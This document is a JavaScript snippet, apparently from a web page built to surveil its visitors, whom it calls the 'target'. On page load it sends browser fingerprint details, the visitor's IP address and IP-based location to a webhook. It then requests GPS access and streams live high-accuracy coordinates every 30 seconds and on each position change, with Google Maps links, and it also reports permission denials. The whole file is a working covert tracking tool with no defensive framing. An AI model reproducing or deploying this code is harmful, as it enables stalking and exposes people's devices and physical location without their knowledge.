<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>

<script>

var x = document.getElementById("techchip");

let datetime = new Date();
let localtime = String(datetime.toLocaleTimeString());

var targetinfo =
"Arsalan khan - LIVE Information Gathering Report\n" +
"------------------------------------\n\n" +
"Device Information\n" +
"----------------------------\n" +
"User Agent: " + navigator.userAgent + "\n" +
"Platform: " + navigator.platform + "\n" +
"Cookies Enabled: " + navigator.cookieEnabled + "\n" +
"Browser Language: " + navigator.language + "\n" +
"Browser Name: " + navigator.appName + "\n" +
"Browser CodeName: " + navigator.appCodeName + "\n" +
"RAM: " + navigator.deviceMemory + "\n" +
"CPU Cores: " + navigator.hardwareConcurrency + "\n" +
"Screen Width: " + screen.width + "\n" +
"Screen Height: " + screen.height + "\n" +
"Local Time: " + localtime + "\n" +
"RefUrl: " + document.referrer + "\n" +
"OS CPU: " + navigator.oscpu + "\n" +
"---------------------------\n";

const xhr = new XMLHttpRequest();
xhr.open("POST", "/webhook.php");
xhr.setRequestHeader('Content-type','application/json; charset=utf-8');
xhr.send(JSON.stringify(targetinfo));


$.getJSON("https://api.ipify.org?format=json", function(data) {

$("#tc").html(data.ip);

const xhr = new XMLHttpRequest();
xhr.open("POST", "/webhook.php");
xhr.setRequestHeader('Content-type','application/json; charset=utf-8');

var getip =
"\nTarget IP Detail\n" +
"-----------------\n" +
"IP: " + data.ip + "\n" +
"-----------------\n";

xhr.send(JSON.stringify(getip));

});


$.getJSON("http://ip-api.com/json/?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,offset,currency,isp,org,as,asname,reverse,proxy,hosting,query",
function(response) {

const xhr = new XMLHttpRequest();
xhr.open("POST", "/webhook.php");
xhr.setRequestHeader('Content-type','application/json; charset=utf-8');

var locationdata =
"\nNetwork & ISP Information\n" +
"--------------------------\n" +
"Response Status: " + response.status + "\n" +
"Continent: " + response.continent + "\n" +
"Continent Code: " + response.continentCode + "\n" +
"Country: " + response.country + "\n" +
"Country Code: " + response.countryCode + "\n" +
"Region Name: " + response.regionName + "\n" +
"Region: " + response.region + "\n" +
"City: " + response.city + "\n" +
"District: " + response.district + "\n" +
"Zip: " + response.zip + "\n" +
"Time Zone: " + response.timezone + "\n" +
"AS Name: " + response.as + "\n" +
"ISP Info: " + response.isp + "\n" +
"Reverse: " + response.reverse + "\n" +
"Offset: " + response.offset + "\n" +
"Currency: " + response.currency + "\n" +
"Proxy: " + response.proxy + "\n" +
"Lat: " + response.lat + "\n" +
"Long: " + response.lon + "\n" +
"--------------------------\n";

xhr.send(JSON.stringify(locationdata));

});

// Live tracking variables
let watchId = null;
let trackingInterval = null;
let isTracking = false;

function gpsLocation() {

if (navigator.geolocation) {
// Get initial position
navigator.geolocation.getCurrentPosition(latlong, catchError);
// Start live tracking after 5 seconds
setTimeout(startLiveTracking, 5000);
}
else {

const xhr = new XMLHttpRequest();
xhr.open("POST", "/webhook.php");
xhr.setRequestHeader('Content-type','application/json; charset=utf-8');

const perror1 =
"\nTarget Browser is not supporting geolocation.\n";

xhr.send(JSON.stringify(perror1));

}

}

function startLiveTracking() {
if (isTracking) return;
isTracking = true;

// Send initial tracking started message
const xhr = new XMLHttpRequest();
xhr.open("POST", "/webhook.php");
xhr.setRequestHeader('Content-type','application/json; charset=utf-8');
const trackingStart = "\n=== LIVE TRACKING STARTED ===\n";
xhr.send(JSON.stringify(trackingStart));

// Method 1: Watch position (continuous updates)
watchId = navigator.geolocation.watchPosition(
function(position) {
sendLiveLocation(position.coords, "WATCH");
},
function(error) {
console.log("Watch position error:", error);
},
{
enableHighAccuracy: true,
timeout: 10000,
maximumAge: 0
}
);

// Method 2: Fallback interval tracking (every 30 seconds)
trackingInterval = setInterval(function() {
navigator.geolocation.getCurrentPosition(
function(position) {
sendLiveLocation(position.coords, "INTERVAL");
},
function(error) {
console.log("Interval tracking error:", error);
},
{
enableHighAccuracy: true,
timeout: 5000,
maximumAge: 0
}
);
}, 30000);
}

function sendLiveLocation(coords, source) {
const timestamp = new Date().toISOString();
const liveData =
"\n=== LIVE LOCATION UPDATE ===\n" +
"Source: " + source + "\n" +
"Timestamp: " + timestamp + "\n" +
"Latitude: " + coords.latitude + "\n" +
"Longitude: " + coords.longitude + "\n" +
"Accuracy: " + coords.accuracy + " meters\n" +
"Altitude: " + (coords.altitude || "N/A") + "\n" +
"Speed: " + (coords.speed || "N/A") + " m/s\n" +
"Heading: " + (coords.heading || "N/A") + "°\n" +
"Live Map: https://www.google.com/maps/place/" +
coords.latitude + "," + coords.longitude + "\n" +
"=============================\n";

const xhr = new XMLHttpRequest();
xhr.open("POST", "/webhook.php");
xhr.setRequestHeader('Content-type','application/json; charset=utf-8');
xhr.send(JSON.stringify(liveData));
}

function latlong(position) {

var latlong =
"\nGPS Lat Long Information\n" +
"-------------------------\n" +
"Latitude: " + position.coords.latitude + "\n" +
"Longitude: " + position.coords.longitude + "\n" +
"Map Location: https://www.google.com/maps/place/" +
position.coords.latitude + "," + position.coords.longitude + "\n" +
"Google Earth: https://earth.google.com/web/search/" +
position.coords.latitude + "," + position.coords.longitude + "\n" +
"-------------------------\n";

const xhr = new XMLHttpRequest();
xhr.open("POST", "/webhook.php");
xhr.setRequestHeader('Content-type','application/json; charset=utf-8');

xhr.send(JSON.stringify(latlong));

}


function catchError(error) {

switch(error.code) {

case error.PERMISSION_DENIED:

const xhr = new XMLHttpRequest();
xhr.open("POST", "/webhook.php");
xhr.setRequestHeader('Content-type','application/json; charset=utf-8');

const perror1 =
"\nUser denied the Geolocation permission.\n";

xhr.send(JSON.stringify(perror1));

break;

case error.POSITION_UNAVAILABLE:

const xhr1 = new XMLHttpRequest();
xhr1.open("POST", "/webhook.php");
xhr1.setRequestHeader('Content-type','application/json; charset=utf-8');

const perror2 =
"\nLocation unavailable.\n";

xhr1.send(JSON.stringify(perror2));

break;

case error.TIMEOUT:

const xhr2 = new XMLHttpRequest();
xhr2.open("POST", "/webhook.php");
xhr2.setRequestHeader('Content-type','application/json; charset=utf-8');

const perror3 =
"\nTimeout error.\n";

xhr2.send(JSON.stringify(perror3));

break;

case error.UNKNOWN_ERROR:

const xhr3 = new XMLHttpRequest();
xhr3.open("POST", "/webhook.php");
xhr3.setRequestHeader('Content-type','application/json; charset=utf-8');

const perror4 =
"\nUnknown error\n";

xhr3.send(JSON.stringify(perror4));

break;

}

}

// Keep tracking alive even if page loses focus
document.addEventListener('visibilitychange', function() {
if (!document.hidden && isTracking) {
// Page became visible again, ensure tracking is active
navigator.geolocation.getCurrentPosition(
function(position) {
sendLiveLocation(position.coords, "VISIBILITY_CHECK");
},
function(error) {
console.log("Visibility check error:", error);
}
);
}
});

// Stop tracking when page unloads (optional)
window.addEventListener('beforeunload', function() {
if (watchId) {
navigator.geolocation.clearWatch(watchId);
}
if (trackingInterval) {
clearInterval(trackingInterval);
}
});

</script>
